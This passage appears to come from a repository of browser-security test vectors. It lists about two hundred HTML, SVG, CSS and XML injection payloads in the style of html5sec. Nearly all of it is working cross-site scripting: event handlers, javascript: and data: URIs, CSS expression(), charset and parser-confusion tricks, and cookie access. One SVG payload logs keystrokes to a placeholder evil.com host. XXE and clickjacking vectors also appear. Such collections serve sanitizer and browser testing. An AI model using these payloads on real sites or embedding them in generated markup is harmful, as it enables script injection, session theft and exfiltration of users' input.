 88 | <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(1)"/><animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(1)"/><foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/></svg>
 89 | <svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(1)"/><animate attributeName="onunload" to="alert(1)"/></svg>
 90 | <div style=content:url(test2.svg)></div>
 91 | [A]<? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>">[B]<? foo="><x foo='?><script>alert(1)</script>'>">[C]<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">[D]<% foo><x foo="%><script>alert(1)</script>">
 92 | <!DOCTYPE><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X
 93 | <div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X
 94 | <svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler></svg>
 95 | <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg>
 96 | mhtml:http://html5sec.org/test.html!xss.htmlmhtml:http://html5sec.org/test.gif!xss.html
 97 | <div id=d><x xmlns="><iframe onload=alert(1)"></div><script>d.innerHTML=d.innerHTML</script>
 98 | <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>
 99 | XXX<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
100 | <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
101 | <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:alert(1)>XXX</a>
102 | <img src="x` `<script>alert(1)</script>"` `>
103 | <script>history.pushState(0,0,'/i/am/somewhere_else');</script>
104 | <svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg>
105 | <iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
106 | <img src onerror /" '"= alt=alert(1)//">
107 | <title onpropertychange=alert(1)></title><title title=>
108 | <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">
109 | <svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg>
110 | <svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg>
111 | <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
112 | <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
113 | <div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>
114 | <x style="background:url('x&#1;;color:red;/*')">XXX</x>
115 | <!--[if]><script>alert(1)</script --><!--[if<img src=x onerror=alert(1)//]> -->
116 | <div id="x">x</div><xml:namespace prefix="t"><import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">
117 | <a href="http://attacker.org"> <iframe src="http://example.org/"></iframe></a>
118 | <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe>
119 | <iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe><textarea type="text" cols="50" rows="10"></textarea>
120 | <script>function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); }}</script><body><a href="#" onclick="makePopups()">Spam</a>
121 | <html xmlns="http://www.w3.org/1999/xhtml"xmlns:svg="http://www.w3.org/2000/svg"><body style="background:gray"><iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/><svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body></html>
122 | <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
123 | <span class=foo>Some text</span><a class=bar href="http://www.example.org">www.example.org</a><script src="http://code.jquery.com/jquery-1.4.4.js"></script><script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>
124 | <script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10<script src="\\example.com\foo.js"></script> // Safari 5.0
125 | <?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id ID #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle></svg>
126 | <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object><object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
127 | <svg xmlns="http://www.w3.org/2000/svg" id="x"><listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/><handler id="y">alert(1)</handler></svg>
128 | <svg><style>&ltimg/src=x onerror=alert(1)// </b>
129 | <svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'><!--Same effect with<image filter='...'>--></svg>
130 | <math href="javascript:alert(1)">CLICKME</math><math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(1)">CLICKME</maction></math>
131 | <b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
132 | <!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" type="password"></form><!-- injection --><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//evil.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//evil.com/?d" /></image></svg>
133 | <img src="x" alt="``onerror=alert(1)//"><div style="font-family:'foobar\27\3bx:expression(alert(2))/*';"></div>
134 | <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
135 | <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
136 | <SCRIPT>document.cookie=true;</SCRIPT>
137 | <IMG SRC="jav ascript:document.cookie=true;">
138 | <IMG SRC="javascript:document.cookie=true;">
139 | <IMG SRC=" &#14; javascript:document.cookie=true;">
140 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
141 | <SCRIPT>document.cookie=true;//<</SCRIPT>
142 | <SCRIPT <B>document.cookie=true;</SCRIPT>
143 | <IMG SRC="javascript:document.cookie=true;">
144 | <iframe src="javascript:document.cookie=true;> 
145 | <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
146 | </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
147 | <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
148 | <BODY BACKGROUND="javascript:document.cookie=true;">
149 | <BODY ONLOAD=document.cookie=true;>
150 | <IMG DYNSRC="javascript:document.cookie=true;">
151 | <IMG LOWSRC="javascript:document.cookie=true;">
152 | <BGSOUND SRC="javascript:document.cookie=true;">
153 | <BR SIZE="&{document.cookie=true}">
154 | <LAYER SRC="javascript:document.cookie=true;"></LAYER>
155 | <LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
156 | <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
157 | ¼script¾document.cookie=true;¼/script¾ 
158 | <IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
159 | <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
160 | <TABLE BACKGROUND="javascript:document.cookie=true;">
161 | <TABLE><TD BACKGROUND="javascript:document.cookie=true;">
162 | <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
163 | <DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)">
164 | <DIV STYLE="width: expression(document.cookie=true);">
165 | <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
166 | <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
167 | <CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
168 | exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
169 | <STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
170 | <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
171 | <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
172 | <SCRIPT>document.cookie=true;</SCRIPT>
173 | <BASE HREF="javascript:document.cookie=true;//">
174 | <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
175 | <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
176 | <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
177 | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
178 | <? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
179 | <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
180 | <a href="javascript#document.cookie=true;">
181 | <div onmouseover="document.cookie=true;">
182 | <img src="javascript:document.cookie=true;">
183 | <img dynsrc="javascript:document.cookie=true;">
184 | <input type="image" dynsrc="javascript:document.cookie=true;">
185 | <bgsound src="javascript:document.cookie=true;">
186 | &<script>document.cookie=true;</script> 
187 | &{document.cookie=true;}; 
188 | <img src=&{document.cookie=true;};> 
189 | <link rel="stylesheet" href="javascript:document.cookie=true;"> 
190 | <img src="mocha:document.cookie=true;"> 
191 | <img src="livescript:document.cookie=true;"> 
192 | <a href="about:<script>document.cookie=true;</script>"> 
193 | <body onload="document.cookie=true;"> 
194 | <div style="background-image: url(javascript:document.cookie=true;);"> 
195 | <div style="behaviour: url([link to code]);"> 
196 | <div style="binding: url([link to code]);"> 
197 | <div style="width: expression(document.cookie=true;);">
198 | <style type="text/javascript">document.cookie=true;</style>
199 | <object classid="clsid:..." codebase="javascript:document.cookie=true;">
200 | <style><!--</style><script>document.cookie=true;//--></script>
201 | <<script>document.cookie=true;</script>
202 | <script>document.cookie=true;//--></script>
203 | <!-- -- --><script>document.cookie=true;</script><!-- -- -->
204 | <img src="blah"onmouseover="document.cookie=true;">
205 | <img src="blah>" onmouseover="document.cookie=true;">
206 | <xml src="javascript:document.cookie=true;">
207 | <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
208 | <div datafld="b" dataformatas="html" datasrc="#X"></div>
209 | 


--------------------------------------------------------------------------------
/vectors.txt:
--------------------------------------------------------------------------------
  1 | >>> vectors()
  2 | 
  3 | <div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div>
  4 | <div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div>
  5 | <div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div>
  6 | <div id="39"><!-- up to Opera 11.52, FF 3.6.28 -->
  7 | <![><img src="]><img src=x onerror=alert(39)//">
  8 | 
  9 | <!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+  -->
 10 | <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div>
 11 | <div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div>
 12 | <div id="41"><li style=list-style:url() onerror=alert(41)></li>
 13 | <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div>
 14 | <div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div>
 15 | <div id="43"><?xml version="1.0" standalone="no"?>
 16 | <html xmlns="http://www.w3.org/1999/xhtml">
 17 | <head>
 18 | <style type="text/css">
 19 | @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
 20 | </style>
 21 | </head>
 22 | <body>Hello</body>
 23 | </html>//["'`-->]]>]</div>
 24 | <div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div>
 25 | <div id="53"><xml id="xss" src="test.htc"></xml>
 26 | <label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div>
 27 | <div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div>
 28 | <div id="61"><div  style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div>
 29 | 
 30 | <div id="62"><!-- IE 6-8 -->
 31 | <x '="foo"><x foo='><img src=x onerror=alert(62)//'>
 32 | 
 33 | <!-- IE 6-9 -->
 34 | <! '="foo"><x foo='><img src=x onerror=alert(2)//'>
 35 | <? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div>
 36 | 
 37 | <div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF
 38 | <img src="javascript:alert(2)">
 39 | <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓
 40 | <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div>
 41 | <div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div>
 42 | <div id="66"><?xml version="1.0"?>
 43 | <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>
 44 | <root/>//["'`-->]]>]</div>
 45 | 
 46 | <div id="67"><!DOCTYPE x [
 47 |     <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"
 48 |  onerror CDATA "alert(67)"
 49 |  onload CDATA "alert(2)">
 50 | ]><img />//["'`-->]]>]</div>
 51 | 
 52 | <div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml">
 53 |     <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x>
 54 | </doc>//["'`-->]]>]</div>
 55 | <div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:ｅｘｐｒｅｓｓｉｏｎ(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div>
 56 | <div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml"  x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div>
 57 | <div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div>
 58 | <div id="87"><svg xmlns="http://www.w3.org/2000/svg">
 59 | <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a>
 60 | </svg>//["'`-->]]>]</div>
 61 | 
 62 | <div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
 63 | 
 64 | <animation xlink:href="javascript:alert(88)"/>
 65 | <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>
 66 | 
 67 | <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>
 68 | 
 69 | <foreignObject xlink:href="javascript:alert(88)"/>
 70 | <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/>
 71 | 
 72 | </svg>//["'`-->]]>]</div>
 73 | 
 74 | <div id="89"><svg xmlns="http://www.w3.org/2000/svg">
 75 | <set attributeName="onmouseover" to="alert(89)"/>
 76 | <animate attributeName="onunload" to="alert(89)"/>
 77 | </svg>//["'`-->]]>]</div>
 78 | 
 79 | <div id="90"><!-- Up to Opera 10.63 -->
 80 | <div style=content:url(test2.svg)></div>
 81 | 
 82 | <!-- Up to Opera 11.64 - see link below -->
 83 | 
 84 | <!-- Up to Opera 12.x -->
 85 | <div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div>
 86 | 
 87 | <div id="91">[A]
 88 | <? foo="><script>alert(91)</script>">
 89 | <! foo="><script>alert(91)</script>">
 90 | </ foo="><script>alert(91)</script>">
 91 | [B]
 92 | <? foo="><x foo='?><script>alert(91)</script>'>">
 93 | [C]
 94 | <! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>">
 95 | [D]
 96 | <% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div>
 97 | <div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div>
 98 | <div id="94"><svg xmlns="http://www.w3.org/2000/svg">
 99 | <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler>
100 | </svg>//["'`-->]]>]</div>
101 | 
102 | <div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
103 | <feImage>
104 | <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,
105 | PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
106 | </feImage>
107 | </svg>//["'`-->]]>]</div>
108 | 
109 | <div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
110 | <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div>
111 | 
112 | <div id="97"><!-- IE 5-9 -->
113 | <div id=d><x xmlns="><iframe onload=alert(97)"></div>
114 | <script>d.innerHTML+='';</script>
115 | 
116 | <!-- IE 10 in IE5-9 Standards mode -->
117 | <div id=d><x xmlns='"><iframe onload=alert(2)//'></div>
118 | <script>d.innerHTML+='';</script>//["'`-->]]>]</div>
119 | 
